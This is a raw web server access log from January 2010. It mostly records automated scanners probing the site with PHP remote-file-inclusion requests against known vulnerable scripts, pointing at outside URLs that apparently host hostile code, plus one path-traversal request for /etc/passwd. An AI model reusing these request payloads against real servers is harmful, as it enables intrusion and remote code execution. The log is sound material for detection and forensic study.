200.93.147.154 - - [18/Jan/2010:00:02:05 -0800] "GET //citywriter/head.php?path=http://www.hotelmoulin.com/db/icon/a.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [18/Jan/2010:00:02:05 -0800] "GET /logs/access_090907.log///citywriter/head.php?path=http://www.hotelmoulin.com/db/icon/a.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [18/Jan/2010:00:02:05 -0800] "GET /logs///citywriter/head.php?path=http://www.hotelmoulin.com/db/icon/a.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [18/Jan/2010:00:02:17 -0800] "GET /logs/access_090921.log///citywriter/head.php?path=http://www.hotelmoulin.com/db/icon/a.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [18/Jan/2010:00:03:06 -0800] "GET /logs/access_090907.log%20%20///citywriter/head.php?path=http://www.hotelmoulin.com/db/icon/a.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [18/Jan/2010:00:03:08 -0800] "GET /logs/access_090921.log%20%20///citywriter/head.php?path=http://www.hotelmoulin.com/db/icon/a.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [18/Jan/2010:00:03:15 -0800] "GET /logs/access_090629.log%20%20///citywriter/head.php?path=http://www.hotelmoulin.com/db/icon/a.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [18/Jan/2010:00:03:15 -0800] "GET /logs/access_091123.log%20%20///citywriter/head.php?path=http://www.hotelmoulin.com/db/icon/a.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [18/Jan/2010:00:03:16 -0800] "GET /logs/access_091019.log%20%20///citywriter/head.php?path=http://www.hotelmoulin.com/db/icon/a.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [18/Jan/2010:00:03:17 -0800] "GET /logs/access_090831.log%20%20///citywriter/head.php?path=http://www.hotelmoulin.com/db/icon/a.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [18/Jan/2010:00:03:18 -0800] "GET /logs/access_091012.log%20%20///citywriter/head.php?path=http://www.hotelmoulin.com/db/icon/a.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [18/Jan/2010:00:03:40 -0800] "GET /logs///citywriter/head.php?path=http://www.hotelmoulin.com/db/icon/a.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [18/Jan/2010:00:03:40 -0800] "GET //citywriter/head.php?path=http://www.hotelmoulin.com/db/icon/a.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [18/Jan/2010:00:03:42 -0800] "GET /logs/access_090907.log%20%20///citywriter/head.php?path=http://www.hotelmoulin.com/db/icon/a.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [18/Jan/2010:00:03:46 -0800] "GET /logs/access_090921.log%20%20///citywriter/head.php?path=http://www.hotelmoulin.com/db/icon/a.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [18/Jan/2010:00:03:48 -0800] "GET /logs/access_090629.log%20%20///citywriter/head.php?path=http://www.hotelmoulin.com/db/icon/a.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [18/Jan/2010:00:03:49 -0800] "GET /logs/access_091019.log%20%20///citywriter/head.php?path=http://www.hotelmoulin.com/db/icon/a.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [18/Jan/2010:00:03:50 -0800] "GET /logs/access_091123.log%20%20///citywriter/head.php?path=http://www.hotelmoulin.com/db/icon/a.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [18/Jan/2010:00:03:51 -0800] "GET /logs/access_090831.log%20%20///citywriter/head.php?path=http://www.hotelmoulin.com/db/icon/a.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [18/Jan/2010:00:04:13 -0800] "GET /logs/access_091012.log%20%20///citywriter/head.php?path=http://www.hotelmoulin.com/db/icon/a.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.202.168.79 - - [18/Jan/2010:00:07:50 -0800] "GET /xinha/plugins/ImageManager/manager.php HTTP/1.0" 404 - "-" "GingerCrawler/1.0 (Language Assistant for Dyslexics; www.gingersoftware.com/crawler_agent.htm; support at ginger software dot com)" "www.galf.org"
200.93.147.154 - - [18/Jan/2010:00:09:03 -0800] "GET //citywriter/head.php?path=http://www.hotelmoulin.com/db/icon/a.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [18/Jan/2010:00:09:03 -0800] "GET /logs/access_090907.log%20%20///citywriter/head.php?path=http://www.hotelmoulin.com/db/icon/a.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [18/Jan/2010:00:09:04 -0800] "GET /logs///citywriter/head.php?path=http://www.hotelmoulin.com/db/icon/a.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [18/Jan/2010:00:09:10 -0800] "GET /logs/access_090921.log%20%20///citywriter/head.php?path=http://www.hotelmoulin.com/db/icon/a.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [18/Jan/2010:00:09:11 -0800] "GET /logs/access_090629.log%20%20///citywriter/head.php?path=http://www.hotelmoulin.com/db/icon/a.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [18/Jan/2010:00:09:11 -0800] "GET /logs/access_091019.log%20%20///citywriter/head.php?path=http://www.hotelmoulin.com/db/icon/a.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [18/Jan/2010:00:09:12 -0800] "GET /logs/access_091123.log%20%20///citywriter/head.php?path=http://www.hotelmoulin.com/db/icon/a.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [18/Jan/2010:00:09:18 -0800] "GET /logs/access_090831.log%20%20///citywriter/head.php?path=http://www.hotelmoulin.com/db/icon/a.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.186.135.33 - - [18/Jan/2010:00:09:22 -0800] "GET /skin/jabusim_link/view.php?dir=http://www.professores.uff.br/wmrezende/images/ChuCu/test.txt??? HTTP/1.1" 404 - "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.galf.org"
64.186.135.33 - - [18/Jan/2010:00:09:22 -0800] "GET /logs//skin/jabusim_link/view.php?dir=http://www.professores.uff.br/wmrezende/images/ChuCu/test.txt??? HTTP/1.1" 404 - "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.galf.org"
200.93.147.154 - - [18/Jan/2010:00:09:34 -0800] "GET /logs/access_091012.log%20%20///citywriter/head.php?path=http://www.hotelmoulin.com/db/icon/a.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.137.163.133 - - [18/Jan/2010:00:10:58 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "-" "www.galf.org"
78.137.163.133 - - [18/Jan/2010:00:10:58 -0800] "GET /logs/access_090223.log HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.11) Gecko GranParadiso/3.0.11" "www.galf.org"
67.195.37.161 - - [18/Jan/2010:00:14:00 -0800] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
67.195.37.161 - - [18/Jan/2010:00:14:00 -0800] "GET /tmp/?N=D HTTP/1.0" 200 504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
209.202.168.79 - - [18/Jan/2010:00:14:48 -0800] "GET /xinha/plugins/ImageManager/demo_images/thumbs.php HTTP/1.0" 404 - "-" "GingerCrawler/1.0 (Language Assistant for Dyslexics; www.gingersoftware.com/crawler_agent.htm; support at ginger software dot com)" "www.galf.org"
217.168.150.158 - - [18/Jan/2010:00:27:12 -0800] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.altayer-motors.com/cv/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
217.168.150.158 - - [18/Jan/2010:00:27:12 -0800] "GET /logs/access_091207.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.altayer-motors.com/cv/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
217.168.150.158 - - [18/Jan/2010:00:27:12 -0800] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.altayer-motors.com/cv/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
217.168.150.158 - - [18/Jan/2010:00:27:29 -0800] "GET /logs/access_091123.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.altayer-motors.com/cv/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
217.168.150.158 - - [18/Jan/2010:00:33:57 -0800] "GET /logs/access_091207.log%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.altayer-motors.com/cv/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [18/Jan/2010:00:33:58 -0800] "GET /logs/access_090928.log//?_SERVER[DOCUMENT_ROOT]=http://suzuki3.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [18/Jan/2010:00:33:58 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://suzuki3.fileave.com/zfxid1.txt? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [18/Jan/2010:00:33:58 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://suzuki3.fileave.com/zfxid1.txt? HTTP/1.1" 200 4804 "-" "Mozilla/5.0" "www.galf.org"
217.168.150.158 - - [18/Jan/2010:00:34:30 -0800] "GET /logs/access_091123.log%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.altayer-motors.com/cv/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [18/Jan/2010:00:34:57 -0800] "GET /logs/access_090817.log//?_SERVER[DOCUMENT_ROOT]=http://suzuki3.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [18/Jan/2010:00:37:25 -0800] "GET /logs/access.log//?_SERVER[DOCUMENT_ROOT]=http://suzuki3.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
64.34.111.74 - - [18/Jan/2010:00:37:25 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://suzuki3.fileave.com/zfxid1.txt? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "galf.org"
64.34.111.74 - - [18/Jan/2010:00:37:25 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://suzuki3.fileave.com/zfxid1.txt? HTTP/1.1" 200 4804 "-" "Mozilla/5.0" "galf.org"
64.34.111.74 - - [18/Jan/2010:00:37:50 -0800] "GET /logs/access_100111.log//?_SERVER[DOCUMENT_ROOT]=http://suzuki3.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [18/Jan/2010:00:37:50 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://suzuki3.fileave.com/zfxid1.txt? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [18/Jan/2010:00:37:51 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://suzuki3.fileave.com/zfxid1.txt? HTTP/1.1" 200 4804 "-" "Mozilla/5.0" "www.galf.org"
189.72.28.14 - - [18/Jan/2010:00:40:52 -0800] "GET /logs/access.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
189.72.28.14 - - [18/Jan/2010:00:40:52 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
189.72.28.14 - - [18/Jan/2010:00:40:53 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
189.72.28.14 - - [18/Jan/2010:00:41:45 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
189.72.28.14 - - [18/Jan/2010:00:41:45 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
189.72.28.14 - - [18/Jan/2010:00:41:46 -0800] "GET /logs/access.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
71.6.189.153 - - [18/Jan/2010:00:41:57 -0800] "GET /logs/access_091207.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://conexionw.com/editor/idbrac.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
71.6.189.153 - - [18/Jan/2010:00:41:57 -0800] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://conexionw.com/editor/idbrac.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
71.6.189.153 - - [18/Jan/2010:00:41:58 -0800] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://conexionw.com/editor/idbrac.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
201.45.123.132 - - [18/Jan/2010:00:42:17 -0800] "GET /logs/access_091207.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://conexionw.com/editor/idbrac.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
201.45.123.132 - - [18/Jan/2010:00:42:18 -0800] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://conexionw.com/editor/idbrac.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
201.45.123.132 - - [18/Jan/2010:00:42:18 -0800] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://conexionw.com/editor/idbrac.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
71.6.189.153 - - [18/Jan/2010:00:43:27 -0800] "GET /logs/access_091123.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://conexionw.com/editor/idbrac.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
201.45.123.132 - - [18/Jan/2010:00:43:32 -0800] "GET /logs/access_091123.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://conexionw.com/editor/idbrac.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
200.93.147.154 - - [18/Jan/2010:00:46:36 -0800] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [18/Jan/2010:00:46:36 -0800] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [18/Jan/2010:00:46:36 -0800] "GET /logs/access_091207.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [18/Jan/2010:00:47:24 -0800] "GET /logs/access_091221.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.250.252.242 - - [18/Jan/2010:00:49:30 -0800] "GET /logs/access_090831.log HTTP/1.1" 200 0 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.galf.org"
200.93.147.154 - - [18/Jan/2010:00:50:14 -0800] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
200.93.147.154 - - [18/Jan/2010:00:50:14 -0800] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
200.93.147.154 - - [18/Jan/2010:00:50:14 -0800] "GET /logs/access.log%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
200.93.147.154 - - [18/Jan/2010:00:50:40 -0800] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [18/Jan/2010:00:50:40 -0800] "GET /logs/access_091109.log%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [18/Jan/2010:00:50:40 -0800] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.195.37.161 - - [18/Jan/2010:00:55:21 -0800] "GET /?D=A HTTP/1.0" 200 1032 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
64.34.111.74 - - [18/Jan/2010:00:58:07 -0800] "GET /logs/access.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.profitbiz.ru/images/CyberUN1/id1.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
64.34.111.74 - - [18/Jan/2010:00:58:07 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.profitbiz.ru/images/CyberUN1/id1.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
64.34.111.74 - - [18/Jan/2010:00:58:07 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.profitbiz.ru/images/CyberUN1/id1.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
64.34.111.74 - - [18/Jan/2010:00:58:17 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.profitbiz.ru/images/CyberUN1/id1.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [18/Jan/2010:00:58:17 -0800] "GET /logs/access_100111.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.profitbiz.ru/images/CyberUN1/id1.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [18/Jan/2010:00:58:17 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.profitbiz.ru/images/CyberUN1/id1.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.28.14 - - [18/Jan/2010:00:58:21 -0800] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.28.14 - - [18/Jan/2010:00:58:21 -0800] "GET /logs/access_091026.log//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.28.14 - - [18/Jan/2010:00:58:21 -0800] "GET /mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.28.14 - - [18/Jan/2010:00:58:54 -0800] "GET /logs/access_091228.log//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [18/Jan/2010:00:59:38 -0800] "GET /logs/access.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.profitbiz.ru/images/CyberUN1/id1.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
64.34.111.74 - - [18/Jan/2010:00:59:38 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.profitbiz.ru/images/CyberUN1/id1.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
64.34.111.74 - - [18/Jan/2010:00:59:38 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.profitbiz.ru/images/CyberUN1/id1.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
64.34.111.74 - - [18/Jan/2010:00:59:47 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.profitbiz.ru/images/CyberUN1/id1.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [18/Jan/2010:00:59:47 -0800] "GET /logs/access_100111.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.profitbiz.ru/images/CyberUN1/id1.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [18/Jan/2010:00:59:47 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.profitbiz.ru/images/CyberUN1/id1.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [18/Jan/2010:01:07:00 -0800] "GET //modules/Forums/admin/admin_styles.php?phpbb_root_path=http://loja.astrofoto.com.pt/components/com_putek/news/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [18/Jan/2010:01:07:07 -0800] "GET //modules/Forums/admin/admin_styles.php?phpbb_root_path=http://loja.astrofoto.com.pt/components/com_putek/news/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [18/Jan/2010:01:07:07 -0800] "GET /logs///modules/Forums/admin/admin_styles.php?phpbb_root_path=http://loja.astrofoto.com.pt/components/com_putek/news/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [18/Jan/2010:01:07:07 -0800] "GET /logs/access_090803.log///modules/Forums/admin/admin_styles.php?phpbb_root_path=http://loja.astrofoto.com.pt/components/com_putek/news/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [18/Jan/2010:01:07:08 -0800] "GET /logs///modules/Forums/admin/admin_styles.php?phpbb_root_path=http://loja.astrofoto.com.pt/components/com_putek/news/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [18/Jan/2010:01:07:08 -0800] "GET /logs/access_090803.log///modules/Forums/admin/admin_styles.php?phpbb_root_path=http://loja.astrofoto.com.pt/components/com_putek/news/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [18/Jan/2010:01:07:15 -0800] "GET /logs/access_091214.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.profitbiz.ru/images/CyberUN1/id1.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [18/Jan/2010:01:08:06 -0800] "GET /logs/access_091214.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.profitbiz.ru/images/CyberUN1/id1.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [18/Jan/2010:01:08:53 -0800] "GET /logs/access.log%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://www.profitbiz.ru/images/CyberUN1/id1.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
64.34.111.74 - - [18/Jan/2010:01:09:00 -0800] "GET /logs/access_100111.log%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://www.profitbiz.ru/images/CyberUN1/id1.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [18/Jan/2010:01:09:06 -0800] "GET /logs/access.log%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://www.profitbiz.ru/images/CyberUN1/id1.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
64.34.111.74 - - [18/Jan/2010:01:09:47 -0800] "GET /logs/access_100111.log%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://www.profitbiz.ru/images/CyberUN1/id1.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [18/Jan/2010:01:11:37 -0800] "GET //modules/Forums/admin/admin_styles.php?phpbb_root_path=http://loja.astrofoto.com.pt/components/com_putek/news/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [18/Jan/2010:01:11:37 -0800] "GET /logs/access_090803.log%20%20///modules/Forums/admin/admin_styles.php?phpbb_root_path=http://loja.astrofoto.com.pt/components/com_putek/news/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [18/Jan/2010:01:11:37 -0800] "GET /logs///modules/Forums/admin/admin_styles.php?phpbb_root_path=http://loja.astrofoto.com.pt/components/com_putek/news/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.31.228.47 - - [18/Jan/2010:01:11:43 -0800] "GET /default.php?page=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.galf.org"
217.168.150.158 - - [18/Jan/2010:01:13:54 -0800] "GET /logs/access.log%20%20/errors.php?error=http://www.altayer-motors.com/cv/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
217.168.150.158 - - [18/Jan/2010:01:13:54 -0800] "GET /errors.php?error=http://www.altayer-motors.com/cv/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
217.168.150.158 - - [18/Jan/2010:01:13:54 -0800] "GET /logs/errors.php?error=http://www.altayer-motors.com/cv/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
200.93.147.154 - - [18/Jan/2010:01:15:13 -0800] "GET /logs//?_zb_path=http://www.psg.gov.ge//album/respon1.txt? HTTP/1.1" 200 4804 "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [18/Jan/2010:01:15:14 -0800] "GET /logs/access_091214.log%20%20//?_zb_path=http://www.psg.gov.ge//album/respon1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [18/Jan/2010:01:15:14 -0800] "GET /?_zb_path=http://www.psg.gov.ge//album/respon1.txt? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
67.195.37.161 - - [18/Jan/2010:01:16:17 -0800] "GET /tmp/?D=A HTTP/1.0" 200 504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
67.19.194.26 - - [18/Jan/2010:01:21:28 -0800] "GET /skin/zero_vote/error.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.194.26 - - [18/Jan/2010:01:21:28 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.194.26 - - [18/Jan/2010:01:21:28 -0800] "GET /logs/access_091116.log%20%20//skin/zero_vote/error.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.194.26 - - [18/Jan/2010:01:21:30 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
